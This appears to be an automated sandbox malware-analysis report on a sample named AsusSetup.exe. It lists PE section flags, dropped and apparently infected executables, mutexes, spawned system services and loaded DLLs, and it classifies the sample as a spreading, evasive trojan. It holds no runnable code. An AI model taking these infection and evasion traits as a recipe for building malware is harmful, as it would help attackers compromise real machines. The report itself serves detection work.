Source: alg.exe, 00000003.00000003.2757167546.0000000000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: setup.exe1.3.drString found in binary or memory: https://support.google.com/chrome/?p=usage_stats_crash_reports
Source: setup.exe1.3.drString found in binary or memory: https://support.google.com/chrome?p=chrome_uninstall_surveymicrosoft-edge:open..
Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\9fbf4662b248c49c.bin
Source: C:\Users\user\Desktop\AsusSetup.exeCode function: 0_2_02002ED00_2_02002ED0
Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00C12ED07_2_00C12ED0
Source: C:\Windows\System32\FXSSVC.exeCode function: 10_2_00D52ED010_2_00D52ED0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_009C2ED011_2_009C2ED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C32ED012_2_00C32ED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
Source: AsusSetup.exeStatic PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: AsusSetup.exeStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
Source: Acrobat.exe.3.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.3.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: OneDriveSetup.exe.3.drStatic PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 47694794 bytes, 767 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 6100 datablocks, 0x1503 compression
Source: identity_helper.exe.3.drStatic PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.3.drStatic PE information: Number of sections : 11 > 10
Source: msedge_proxy.exe0.3.drStatic PE information: Number of sections : 12 > 10
Source: elevation_service.exe.0.drStatic PE information: Number of sections : 12 > 10
Source: notification_click_helper.exe.3.drStatic PE information: Number of sections : 13 > 10
Source: pwahelper.exe0.3.drStatic PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.3.drStatic PE information: Number of sections : 12 > 10
Source: setup.exe.3.drStatic PE information: Number of sections : 13 > 10
Source: elevation_service.exe0.0.drStatic PE information: Number of sections : 12 > 10
Source: msedgewebview2.exe.3.drStatic PE information: Number of sections : 14 > 10
Source: pwahelper.exe.3.drStatic PE information: Number of sections : 12 > 10
Source: msedge_pwa_launcher.exe.3.drStatic PE information: Number of sections : 13 > 10
Source: AsusSetup.exe, 00000000.00000003.2170935877.0000000002B40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs AsusSetup.exe
Source: AsusSetup.exe, 00000000.00000003.2150492355.0000000003080000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs AsusSetup.exe
Source: AsusSetup.exe, 00000000.00000003.2192482783.0000000002B40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemaintenanceservice.exe0 vs AsusSetup.exe
Source: AsusSetup.exe, 00000000.00000003.2154412690.0000000002B00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs AsusSetup.exe
Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Source: AsusSetup.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroTextExtractor.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADelRCP.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate32.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVLP.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OneDriveSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADNotificationManager.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeCollabSync.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WCChromeNativeMessagingHost.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVLP.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OneDriveSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ADNotificationManager.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeCollabSync.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WCChromeNativeMessagingHost.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.3.dr, Binary string: ntdll.dll\Device\\Device\HarddiskVolumeP
Source: plugin-container.exe.3.dr, Binary string: \Device\\??\
Source: classification engine, Classification label: mal100.spre.troj.expl.evad.winEXE@7/130@156/19
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\Desktop\AsusSetup.exe, File created: C:\Users\user\AppData\Roaming\9fbf4662b248c49c.bin
Source: C:\Windows\System32\alg.exe, Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-9fbf4662b248c49c9ea72c54-b
Source: C:\Users\user\Desktop\AsusSetup.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-9fbf4662b248c49c73779169-b
Source: C:\Users\user\Desktop\AsusSetup.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-9fbf4662b248c49c-inf
Source: C:\Windows\System32\FXSSVC.exe, File created: C:\Windows\TEMP\FXSSVCDebugLogFile.txt
Source: C:\Users\user\Desktop\AsusSetup.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AsusSetup.exe, ReversingLabs: Detection: 73%
Source: AsusSetup.exe, String found in binary or memory: </LAUNCH_ICON>
Source: AsusSetup.exe, String found in binary or memory: </LAUNCH_BTN>
Source: unknown, Process created: C:\Users\user\Desktop\AsusSetup.exe "C:\Users\user\Desktop\AsusSetup.exe"
Source: unknown, Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown, Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown, Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown, Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown, Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown, Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: oledlg.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: userenv.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: newdev.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: winmm.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: devobj.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: devrtl.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: mpr.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: secur32.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\AsusSetup.exe, Section loaded: webio.dll
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe, Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe, Section loaded: winhttp.dll
Source: C:\Windows\System32\alg.exe, Section loaded: mpr.dll
Source: C:\Windows\System32\alg.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\alg.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\alg.exe, Section loaded: dnsapi.dll
Source: C:\Windows\System32\alg.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\System32\alg.exe, Section loaded: ntmarta.dll
Source: C:\Windows\System32\alg.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe, Section loaded: winnsi.dll
Source: C:\Windows\System32\alg.exe, Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\alg.exe, Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\alg.exe, Section loaded: webio.dll
Source: C:\Windows\System32\alg.exe, Section loaded: drprov.dll
